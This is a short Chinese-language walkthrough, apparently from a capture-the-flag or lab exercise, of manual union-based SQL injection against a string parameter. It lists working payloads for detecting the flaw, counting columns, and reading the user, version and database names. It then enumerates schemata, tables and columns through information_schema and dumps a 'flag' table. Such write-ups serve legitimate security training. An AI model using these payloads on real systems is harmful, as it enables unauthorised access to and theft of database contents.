1.输入1‘测试，发现报错 输入' and 1=1测试，无法注入 输入1’and 1=1 --   注意：--后面有空格 输入'and 1=2 -- ,报错 因此判断，该url为字符型注入   2.判断列数，输入1' order by 3 -- ' 输入1' order by 2 -- ' 因此字段数是2   3.判断信息是第几列， ' union select 1,2 -- '   4.查询用户， ' union select 1,user() -- '，查询结果为：root用户   5.访问数据库， ' union select 1,version() -- ' 根据数据库版本得知，为MySQL的一个分支   6.查询当前数据库名称， ' union select 1,database() - 数据库名称为sqli   7.获取数据库名称， ' union select 1,group_concat(schema_name) from information_schema.schemata -- ' 查询得知，当前数据库为： information_schema,mysql,performance_schema,sqli   8.查询表名 ' union select table_schema, group_concat(table_name) from information_schema.tables where table_schema='sqli' -- ' 得知，sqli库中有两个表：flag、news   8.查询列名 ' union select table_name,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1) -- '   9.查看指定数据库指定表的列的内容 ' union select 1,group_concat(flag) from sqli.flag -- '